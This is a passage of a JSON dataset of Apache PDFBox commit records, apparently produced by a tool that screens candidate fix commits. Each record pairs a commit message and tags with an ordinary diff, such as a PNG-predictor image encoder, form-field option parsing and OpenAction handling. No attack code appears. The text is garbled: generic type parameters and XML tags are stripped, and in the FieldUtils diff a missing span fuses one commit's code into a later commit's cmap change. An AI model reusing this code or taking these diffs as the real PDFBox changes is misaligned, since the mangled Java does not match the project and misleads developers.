"3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4187", + "relevance": 2 + } + ] + }, + { + "commit_id": "2e885fa63a34a17c0cfef271128417463adea361", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530476887, + "hunks": 11, + "message": "PDFBOX-4184: support predictor compression and 16 bit RGB images, by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834805 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 70d71fd9e..457d9825b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -18,3 +18,8 @@ package org.apache.pdfbox.pdmodel.graphics.image;", + " import java.awt.Transparency;", + "+import java.awt.color.ColorSpace;", + "+import java.awt.color.ICC_ColorSpace;", + "+import java.awt.color.ICC_Profile;", + " import java.awt.image.BufferedImage;", + "+import java.awt.image.DataBuffer;", + "+import java.awt.image.Raster;", + " import java.io.ByteArrayInputStream;", + "@@ -22,4 +27,9 @@ import java.io.ByteArrayOutputStream;", + " import java.io.IOException;", + "+import java.io.OutputStream;", + "+import java.util.Arrays;", + "+import java.util.zip.Deflater;", + "+import java.util.zip.DeflaterOutputStream;", + " import javax.imageio.stream.MemoryCacheImageOutputStream;", + " import org.apache.pdfbox.cos.COSDictionary;", + "+import org.apache.pdfbox.cos.COSInteger;", + " import org.apache.pdfbox.cos.COSName;", + "@@ -29,2 +39,3 @@ import org.apache.pdfbox.pdmodel.PDDocument;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColorSpace;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceCMYK;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceColorSpace;", + "@@ -32,2 +43,3 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDICCBased;", + "@@ -40,2 +52,7 @@ public final class LosslessFactory", + " {", + "+ /** ", + "+ * Internal, only for benchmark purpose", + "+ */", + "+ static boolean usePredictorEncoder = true;", + "+", + " private LosslessFactory()", + "@@ -43,3 +60,3 @@ public final class LosslessFactory", + " }", + "- ", + "+", + " /**", + "@@ -62,4 +79,15 @@ public final class LosslessFactory", + " {", + "+ // We try to encode the image with predictor", + "+ if (usePredictorEncoder)", + "+ {", + "+ PDImageXObject pdImageXObject = new PredictorEncoder(document, image).encode();", + "+ if (pdImageXObject != null)", + "+ {", + "+ return pdImageXObject;", + "+ }", + "+ }", + "+", + "+ // Fallback: We export the image as 8-bit sRGB and might loose color information", + " return createFromRGBImage(image, document);", + "- } ", + "+ }", + " }", + "@@ -192,2 +220,457 @@ public final class LosslessFactory", + "+ private static class PredictorEncoder", + "+ {", + "+ private final PDDocument document;", + "+ private final BufferedImage image;", + "+ private final int componentsPerPixel;", + "+ private final int transferType;", + "+ private final int bytesPerComponent;", + "+ private final int bytesPerPixel;", + "+", + "+ private final int height;", + "+ private final int width;", + "+", + "+ private final byte[] dataRawRowNone;", + "+ private final byte[] dataRawRowSub;", + "+ private final byte[] dataRawRowUp;", + "+ private final byte[] dataRawRowAverage;", + "+ private final byte[] dataRawRowPaeth;", + "+", + "+ final int imageType;", + "+ final boolean hasAlpha;", + "+ final byte[] alphaImageData;", + "+", + "+ final byte[] aValues;", + "+ final byte[] cValues;", + "+ final byte[] bValues;", + "+ final byte[] xValues;", + "+ final byte[] tmpResultValues;", + "+", + "+ /**", + "+ * Initialize the encoder and set all final fields", + "+ */", + "+ PredictorEncoder(PDDocument document, BufferedImage image)", + "+ {", + "+ this.document = document;", + "+ this.image = image;", + "+", + "+ // The raw count of components per pixel including optional alpha", + "+ this.componentsPerPixel = image.getColorModel().getNumComponents();", + "+ this.transferType = image.getRaster().getTransferType();", + "+ this.bytesPerComponent = (transferType == DataBuffer.TYPE_SHORT", + "+ || transferType == DataBuffer.TYPE_USHORT) ? 2 : 1;", + "+", + "+ // Only the bytes we need in the output (excluding alpha)", + "+ this.bytesPerPixel = image.getColorModel().getNumColorComponents() * bytesPerComponent;", + "+", + "+ this.height = image.getHeight();", + "+ this.width = image.getWidth();", + "+ this.imageType = image.getType();", + "+ this.hasAlpha = image.getColorModel().getNumComponents() != image.getColorModel()", + "+ .getNumColorComponents();", + "+ this.alphaImageData = hasAlpha ? new byte[width * height * bytesPerComponent] : null;", + "+", + "+ // The rows have 1-byte encoding marker and width * BYTES_PER_PIXEL pixel-bytes", + "+ int dataRowByteCount = width * bytesPerPixel + 1;", + "+ this.dataRawRowNone = new byte[dataRowByteCount];", + "+ this.dataRawRowSub = new byte[dataRowByteCount];", + "+ this.dataRawRowUp = new byte[dataRowByteCount];", + "+ this.dataRawRowAverage = new byte[dataRowByteCount];", + "+ this.dataRawRowPaeth = new byte[dataRowByteCount];", + "+", + "+ // Write the encoding markers", + "+ dataRawRowNone[0] = 0;", + "+ dataRawRowSub[0] = 1;", + "+ dataRawRowUp[0] = 2;", + "+ dataRawRowAverage[0] = 3;", + "+ dataRawRowPaeth[0] = 4;", + "+", + "+ // c | b", + "+ // -----", + "+ // a | x", + "+ //", + "+ // x => current pixel", + "+ this.aValues = new byte[bytesPerPixel];", + "+ this.cValues = new byte[bytesPerPixel];", + "+ this.bValues = new byte[bytesPerPixel];", + "+ this.xValues = new byte[bytesPerPixel];", + "+ this.tmpResultValues = new byte[bytesPerPixel];", + "+ }", + "+", + "+ /**", + "+ * Tries to compress the image using a predictor.", + "+ *", + "+ * @return the image or null if it is not possible to encoded the image (e.g. not supported", + "+ * raster format etc.)", + "+ */", + "+ PDImageXObject encode() throws IOException", + "+ {", + "+ Raster imageRaster = image.getRaster();", + "+ final int elementsInRowPerPixel;", + "+", + "+ // This variable store a row of the image each, the exact type depends", + "+ // on the image encoding. Can be a int[], short[] or byte[]", + "+ Object prevRow, transferRow;", + "+", + "+ switch (imageType)", + "+ {", + "+ case BufferedImage.TYPE_CUSTOM:", + "+ {", + "+ switch (imageRaster.getTransferType())", + "+ {", + "+ case DataBuffer.TYPE_USHORT:", + "+ elementsInRowPerPixel = componentsPerPixel;", + "+ prevRow = new short[width * elementsInRowPerPixel];", + "+ transferRow = new short[width * elementsInRowPerPixel];", + "+ break;", + "+ case DataBuffer.TYPE_BYTE:", + "+ elementsInRowPerPixel = componentsPerPixel;", + "+ prevRow = new byte[width * elementsInRowPerPixel];", + "+ transferRow = new byte[width * elementsInRowPerPixel];", + "+ break;", + "+ default:", + "+ return null;", + "+ }", + "+ break;", + "+ }", + "+", + "+ case BufferedImage.TYPE_3BYTE_BGR:", + "+ case BufferedImage.TYPE_4BYTE_ABGR:", + "+ {", + "+ elementsInRowPerPixel = componentsPerPixel;", + "+ prevRow = new byte[width * elementsInRowPerPixel];", + "+ transferRow = new byte[width * elementsInRowPerPixel];", + "+ break;", + "+ }", + "+", + "+ case BufferedImage.TYPE_INT_BGR:", + "+ case BufferedImage.TYPE_INT_ARGB:", + "+ case BufferedImage.TYPE_INT_RGB:", + "+ {", + "+ elementsInRowPerPixel = 1;", + "+ prevRow = new int[width * elementsInRowPerPixel];", + "+ transferRow = new int[width * elementsInRowPerPixel];", + "+ break;", + "+ }", + "+", + "+ default:", + "+ // We can not handle this unknown format", + "+ return null;", + "+ }", + "+", + "+ final int elementsInTransferRow = width * elementsInRowPerPixel;", + "+", + "+ // pre-size the output stream to half of the maximum size", + "+ ByteArrayOutputStream stream = new ByteArrayOutputStream(", + "+ height * width * bytesPerPixel / 2);", + "+ Deflater deflater = new Deflater(Filter.getCompressionLevel());", + "+ DeflaterOutputStream zip = new DeflaterOutputStream(stream, deflater);", + "+", + "+ int alphaPtr = 0;", + "+", + "+ for (int rowNum = 0; rowNum < height; rowNum++)", + "+ {", + "+ imageRaster.getDataElements(0, rowNum, width, 1, transferRow);", + "+", + "+ // We start to write at index one, as the predictor marker is in index zero", + "+ int writerPtr = 1;", + "+ Arrays.fill(aValues, (byte) 0);", + "+ Arrays.fill(cValues, (byte) 0);", + "+", + "+ final byte[] transferRowByte;", + "+ final byte[] prevRowByte;", + "+ final int[] transferRowInt;", + "+ final int[] prevRowInt;", + "+ final short[] transferRowShort;", + "+ final short[] prevRowShort;", + "+", + "+ if (transferRow instanceof byte[])", + "+ {", + "+ transferRowByte = (byte[]) transferRow;", + "+ prevRowByte = (byte[]) prevRow;", + "+ transferRowInt = prevRowInt = null;", + "+ transferRowShort = prevRowShort = null;", + "+ }", + "+ else if (transferRow instanceof int[])", + "+ {", + "+ transferRowInt = (int[]) transferRow;", + "+ prevRowInt = (int[]) prevRow;", + "+ transferRowShort = prevRowShort = null;", + "+ transferRowByte = prevRowByte = null;", + "+ }", + "+ else", + "+ {", + "+ // This must be short[]", + "+ transferRowShort = (short[]) transferRow;", + "+ prevRowShort = (short[]) prevRow;", + "+ transferRowInt = prevRowInt = null;", + "+ transferRowByte = prevRowByte = null;", + "+ }", + "+", + "+ for (int indexInTransferRow = 0; indexInTransferRow < elementsInTransferRow;", + "+ indexInTransferRow += elementsInRowPerPixel, alphaPtr += bytesPerComponent)", + "+ {", + "+ // Copy the pixel values into the byte array", + "+ if (transferRowByte != null)", + "+ {", + "+ copyImageBytes(transferRowByte, indexInTransferRow, xValues, alphaImageData,", + "+ alphaPtr);", + "+ copyImageBytes(prevRowByte, indexInTransferRow, bValues, null, 0);", + "+ }", + "+ else if (transferRowInt != null)", + "+ {", + "+ copyIntToBytes(transferRowInt, indexInTransferRow, xValues, alphaImageData,", + "+ alphaPtr);", + "+ copyIntToBytes(prevRowInt, indexInTransferRow, bValues, null, 0);", + "+ }", + "+ else", + "+ {", + "+ // This must be short[]", + "+ copyShortsToBytes(transferRowShort, indexInTransferRow, xValues, alphaImageData, alphaPtr);", + "+ copyShortsToBytes(prevRowShort, indexInTransferRow, bValues, null, 0);", + "+ }", + "+", + "+ // Encode the pixel values in the different encodings", + "+ int length = xValues.length;", + "+ for (int bytePtr = 0; bytePtr < length; bytePtr++)", + "+ {", + "+ int x = xValues[bytePtr] & 0xFF;", + "+ int a = aValues[bytePtr] & 0xFF;", + "+ int b = bValues[bytePtr] & 0xFF;", + "+ int c = cValues[bytePtr] & 0xFF;", + "+ dataRawRowNone[writerPtr] = (byte) x;", + "+ dataRawRowSub[writerPtr] = pngFilterSub(x, a);", + "+ dataRawRowUp[writerPtr] = pngFilterUp(x, b);", + "+ dataRawRowAverage[writerPtr] = pngFilterAverage(x, a, b);", + "+ dataRawRowPaeth[writerPtr] = pngFilterPaeth(x, a, b, c);", + "+ writerPtr++;", + "+ }", + "+", + "+ // We shift the values into the prev / upper left values for the next pixel", + "+ System.arraycopy(xValues, 0, aValues, 0, bytesPerPixel);", + "+ System.arraycopy(bValues, 0, cValues, 0, bytesPerPixel);", + "+ }", + "+", + "+ byte[] rowToWrite = chooseDataRowToWrite();", + "+", + "+ // Write and compress the row as long it is hot (CPU cache wise)", + "+ zip.write(rowToWrite, 0, rowToWrite.length);", + "+", + "+ {", + "+ // We swap prev and transfer row, so that we have the prev row for the next row.", + "+ Object temp = prevRow;", + "+ prevRow = transferRow;", + "+ transferRow = temp;", + "+ }", + "+ }", + "+ zip.close();", + "+ deflater.end();", + "+", + "+ return preparePredictorPDImage(stream, bytesPerComponent * 8);", + "+ }", + "+", + "+ private void copyIntToBytes(int[] transferRow, int indexInTranferRow, byte[] targetValues,", + "+ byte[] alphaImageData, int alphaPtr)", + "+ {", + "+ int val = transferRow[indexInTranferRow];", + "+ byte b0 = (byte) ((val & 0xFF));", + "+ byte b1 = (byte) ((val >> 8) & 0xFF);", + "+ byte b2 = (byte) ((val >> 16) & 0xFF);", + "+", + "+ switch (imageType)", + "+ {", + "+ case BufferedImage.TYPE_INT_BGR:", + "+ {", + "+ targetValues[0] = b0;", + "+ targetValues[1] = b1;", + "+ targetValues[2] = b2;", + "+ break;", + "+ }", + "+ case BufferedImage.TYPE_INT_ARGB:", + "+ {", + "+ targetValues[0] = b2;", + "+ targetValues[1] = b1;", + "+ targetValues[2] = b0;", + "+ if (alphaImageData != null)", + "+ {", + "+ byte b3 = (byte) ((val >> 24) & 0xFF);", + "+ alphaImageData[alphaPtr] = b3;", + "+ }", + "+ break;", + "+ }", + "+ case BufferedImage.TYPE_INT_RGB:", + "+ targetValues[0] = b2;", + "+ targetValues[1] = b1;", + "+ targetValues[2] = b0;", + "+ break;", + "+ }", + "+ }", + "+", + "+ private void copyImageBytes(byte[] transferRow, int indexInTranferRow, byte[] targetValues,", + "+ byte[] alphaImageData, int alphaPtr)", + "+ {", + "+ System.arraycopy(transferRow, indexInTranferRow, targetValues, 0, targetValues.length);", + "+ if (alphaImageData != null)", + "+ {", + "+ alphaImageData[alphaPtr] = transferRow[indexInTranferRow + targetValues.length];", + "+ }", + "+ }", + "+", + "+ private static void copyShortsToBytes(short[] transferRow, int indexInTranferRow,", + "+ byte[] targetValues, byte[] alphaImageData, int alphaPtr)", + "+ {", + "+ for (int i = 0; i < targetValues.length;)", + "+ {", + "+ short val = transferRow[indexInTranferRow++];", + "+ targetValues[i++] = (byte) ((val >> 8) & 0xFF);", + "+ targetValues[i++] = (byte) (val & 0xFF);", + "+ }", + "+ if (alphaImageData != null)", + "+ {", + "+ short alpha = transferRow[indexInTranferRow];", + "+ alphaImageData[alphaPtr] = (byte) ((alpha >> 8) & 0xFF);", + "+ alphaImageData[alphaPtr + 1] = (byte) (alpha & 0xFF);", + "+ }", + "+ }", + "+", + "+ private PDImageXObject preparePredictorPDImage(ByteArrayOutputStream stream,", + "+ int bitsPerComponent) throws IOException", + "+ {", + "+ int h = image.getHeight();", + "+ int w = image.getWidth();", + "+", + "+ ColorSpace srcCspace = image.getColorModel().getColorSpace();", + "+ PDColorSpace pdColorSpace = srcCspace.getType() != ColorSpace.TYPE_CMYK", + "+ ? PDDeviceRGB.INSTANCE : PDDeviceCMYK.INSTANCE;", + "+", + "+ // Encode the image profile if the image has one", + "+ if (srcCspace instanceof ICC_ColorSpace)", + "+ {", + "+ ICC_ColorSpace icc_colorSpace = (ICC_ColorSpace) srcCspace;", + "+ ICC_Profile profile = icc_colorSpace.getProfile();", + "+ // We only encode a color profile if it is not sRGB", + "+ if (profile != ICC_Profile.getInstance(ColorSpace.CS_sRGB))", + "+ {", + "+ PDICCBased pdProfile = new PDICCBased(document);", + "+ OutputStream outputStream = pdProfile.getPDStream()", + "+ .createOutputStream(COSName.FLATE_DECODE);", + "+ outputStream.write(profile.getData());", + "+ outputStream.close();", + "+ pdProfile.getPDStream().getCOSObject().setInt(COSName.N,", + "+ srcCspace.getNumComponents());", + "+ }", + "+ }", + "+", + "+ PDImageXObject imageXObject = new PDImageXObject(document,", + "+ new ByteArrayInputStream(stream.toByteArray()), COSName.FLATE_DECODE, w,", + "+ h, bitsPerComponent, pdColorSpace);", + "+", + "+ COSDictionary decodeParms = new COSDictionary();", + "+ decodeParms.setItem(COSName.BITS_PER_COMPONENT, COSInteger.get(bitsPerComponent));", + "+ decodeParms.setItem(COSName.PREDICTOR, COSInteger.get(15));", + "+ decodeParms.setItem(COSName.COLUMNS, COSInteger.get(w));", + "+ decodeParms.setItem(COSName.COLORS, COSInteger.get(srcCspace.getNumComponents()));", + "+ imageXObject.getCOSObject().setItem(COSName.DECODE_PARMS, decodeParms);", + "+", + "+ if (image.getTransparency() != Transparency.OPAQUE)", + "+ {", + "+ PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", + "+ image.getWidth(), image.getHeight(), 8 * bytesPerComponent, PDDeviceGray.INSTANCE);", + "+ imageXObject.getCOSObject().setItem(COSName.SMASK, pdMask);", + "+ }", + "+ return imageXObject;", + "+ }", + "+", + "+ /**", + "+ * We look which row encoding is the \"best\" one, ie. has the lowest sum. We don't implement", + "+ * anything fancier to choose the right row encoding. This is just the recommend algorithm", + "+ * in the spec. The get the perfect encoding you would need to do a brute force check how", + "+ * all the different encoded rows compress in the zip stream together. You have would have", + "+ * to check 5*image-height permutations...", + "+ *", + "+ * @return the \"best\" row encoding of the row encodings", + "+ */", + "+ private byte[] chooseDataRowToWrite()", + "+ {", + "+ byte[] rowToWrite = dataRawRowNone;", + "+ long estCompressSum = estCompressSum(dataRawRowNone);", + "+ long estCompressSumSub = estCompressSum(dataRawRowSub);", + "+ long estCompressSumUp = estCompressSum(dataRawRowUp);", + "+ long estCompressSumAvg = estCompressSum(dataRawRowAverage);", + "+ long estCompressSumPaeth = estCompressSum(dataRawRowPaeth);", + "+ if (estCompressSum > estCompressSumSub)", + "+ {", + "+ rowToWrite = dataRawRowSub;", + "+ estCompressSum = estCompressSumSub;", + "+ }", + "+ if (estCompressSum > estCompressSumUp)", + "+ {", + "+ rowToWrite = dataRawRowUp;", + "+ estCompressSum = estCompressSumUp;", + "+ }", + "+ if (estCompressSum > estCompressSumAvg)", + "+ {", + "+ rowToWrite = dataRawRowAverage;", + "+ estCompressSum = estCompressSumAvg;", + "+ }", + "+ if (estCompressSum > estCompressSumPaeth)", + "+ {", + "+ rowToWrite = dataRawRowPaeth;", + "+ }", + "+ return rowToWrite;", + "+ }", + "+", + "+ /*", + "+ * PNG Filters, see https://www.w3.org/TR/PNG-Filters.html", + "+ */", + "+ private static byte pngFilterSub(int x, int a)", + "+ {", + "+ return (byte) ((x & 0xFF) - (a & 0xFF));", + "+ }", + "+", + "+ private static byte pngFilterUp(int x, int b)", + "+ {", + "+ // Same as pngFilterSub, just called with the prior row", + "+ return pngFilterSub(x, b);", + "+ }", + "+", + "+ private static byte pngFilterAverage(int x, int a, int b)", + "+ {", + "+ return (byte) (x - ((b + a) / 2));", + "+ }", + "+", + "+ private static byte pngFilterPaeth(int x, int a, int b, int c)", + "+ {", + "+ int p = a + b - c;", + "+ int pa = Math.abs(p - a);", + "+ int pb = Math.abs(p - b);", + "+ int pc = Math.abs(p - c);", + "+ final int Pr;", + "+ if (pa <= pb && pa <= pc)", + "+ {", + "+ Pr = a;", + "+ }", + "+ else if (pb <= pc)", + "+ {", + "+ Pr = b;", + "+ }", + "+ else", + "+ {", + "+ Pr = c;", + "+ }", + "+", + "+ int r = x - Pr;", + "+ return (byte) (r);", + "+ }", + "+", + "+ private static long estCompressSum(byte[] dataRawRowSub)", + "+ {", + "+ long sum = 0;", + "+ for (byte aDataRawRowSub : dataRawRowSub)", + "+ {", + "+ sum += aDataRawRowSub & 0xFF;", + "+ }", + "+ return sum;", + "+ }", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "faeb110e8ded732ba776cd27bb95a7c38c0c2202" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "6285b5369cfdcc4ec876a53e93b3f6d98061ebe8", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532244884, + "hunks": 1, + "message": "PDFBOX-4071: use current version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836423 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index f20dc274c..6201cf029 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -79,3 +79,3 @@", + " ant", + "- 1.9.9", + "+ 1.10.5", + " " + ], + "changed_files": [ + "examples/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "7671e388a8f7989664f3dfceaac20d3e47455052" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "9fb0e579405d5780eee4a7f31ba7c5459cc59e37", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523114251, + "hunks": 4, + "message": "PDFBOX-4185: support COSString, COSArray mixed options entries git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828595 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java", + "index 1872e3a20..58816b3e0 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/FieldUtils.java", + "@@ -27,3 +27,2 @@ import org.apache.pdfbox.cos.COSBase;", + " import org.apache.pdfbox.cos.COSString;", + "-import org.apache.pdfbox.pdmodel.common.COSArrayList;", + "@@ -177,34 +176,21 @@ public final class FieldUtils", + " {", + "- // test if there is a single text or a two-element array ", + "- COSBase entry = ((COSArray) items).get(0);", + "- if (entry instanceof COSString)", + "+ List entryList = new ArrayList(); ", + "+ for (COSBase entry : (COSArray) items)", + " {", + "- return COSArrayList.convertCOSStringCOSArrayToList((COSArray)items);", + "- } ", + "- else", + "- {", + "- return getItemsFromPair(items, pairIdx);", + "- } ", + "+ if (entry instanceof COSString)", + "+ {", + "+ entryList.add(((COSString) entry).getString());", + "+ }", + "+ else if (entry instanceof COSArray)", + "+ {", + "+ COSArray cosArray = (COSArray) entry;", + "+ if (cosArray.size() >= pairIdx +1 && cosArray.get(pairIdx) instanceof COSString)", + "+ {", + "+ entryList.add(((COSString) cosArray.get(pairIdx)).getString());", + "+ }", + "+ }", + "+ }", + "+ return entryList; ", + " }", + " return Collections.emptyList();", + "- } ", + "-", + "- /**", + "- * Return either one of a list of two-element arrays entries.", + "- *", + "- * @param items the array of elements or two-element arrays", + "- * @param pairIdx the index into the two-element array", + "- * @return a List of single elements", + "- */", + "- private static List getItemsFromPair(COSBase items, int pairIdx)", + "- {", + "- List exportValues = new ArrayList();", + "- int numItems = ((COSArray) items).size();", + "- for (int i=0;i> glyphIdToCharacterCodeMultiple = new HashMap<>();", + "- private Map characterCodeToGlyphId;", + "+ private Map characterCodeToGlyphId = new HashMap<>();" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/CmapSubtable.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4230": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "72948ab4a0b57ad2a99900abaab54391cdaa6b16" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4230", + "relevance": 2 + } + ] + }, + { + "commit_id": "06a515b3ab42530c2238970b56b9bcd01e368528", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526594362, + "hunks": 3, + "message": "PDFBOX-4204: ignore all illegal OpenAction types git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831819 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java", + "index e3b1e6f84..2f841fc15 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java", + "@@ -27,3 +27,2 @@ import org.apache.pdfbox.cos.COSArray;", + " import org.apache.pdfbox.cos.COSBase;", + "-import org.apache.pdfbox.cos.COSBoolean;", + " import org.apache.pdfbox.cos.COSDictionary;", + "@@ -254,18 +253,3 @@ public class PDDocumentCatalog implements COSObjectable", + " COSBase openAction = root.getDictionaryObject(COSName.OPEN_ACTION);", + "- if (openAction == null)", + "- {", + "- return null;", + "- }", + "- else if (openAction instanceof COSBoolean)", + "- {", + "- if (((COSBoolean) openAction).getValue() == false)", + "- {", + "- return null;", + "- }", + "- else", + "- {", + "- throw new IOException(\"Can't create OpenAction from COSBoolean\");", + "- }", + "- }", + "- else if (openAction instanceof COSDictionary)", + "+ if (openAction instanceof COSDictionary)", + " {", + "@@ -279,3 +263,3 @@ public class PDDocumentCatalog implements COSObjectable", + " {", + "- throw new IOException(\"Unknown OpenAction \" + openAction);", + "+ return null;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocumentCatalog.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4204": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "59d19e8d97b8a84dfa6c06723fdc89814be99fb2" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4204", + "relevance": 2 + } + ] + }, + { + "commit_id": "4dad057da959ff794c4f89111336c7f2b519c2e7", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524334371, + "hunks": 1, + "message": "PDFBOX-4071: use KCMS when available git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829737 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java b/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java", + "index 29ea7159c..946ecd7ea 100644", + "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java", + "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java", + "@@ -70,2 +70,13 @@ public class Validator_A1b", + "+ try", + "+ {", + "+ // force KCMS (faster than LCMS) if available", + "+ Class.forName(\"sun.java2d.cmm.kcms.KcmsServiceProvider\");", + "+ System.setProperty(\"sun.java2d.cmm\", \"sun.java2d.cmm.kcms.KcmsServiceProvider\");", + "+ }", + "+ catch (ClassNotFoundException e)", + "+ {", + "+ // ignore", + "+ }", + "+", + " // is output xml ?" + ], + "changed_files": [ + "preflight/src/main/java/org/apache/pdfbox/preflight/Validator_A1b.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "db088fa2a060b6cc900204488f27ea184e24d3e2" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "40b34e561c78b3b1dea86062376b69d0754fc14b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529424072, + "hunks": 1, + "message": "PDFBOX-4242: fulfill the close() contract, as suggested by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833857 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java b/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java", + "index 7a199d9b1..0e54827cc 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/RAFDataStream.java", + "@@ -98,4 +98,7 @@ class RAFDataStream extends TTFDataStream", + " {", + "- raf.close();", + 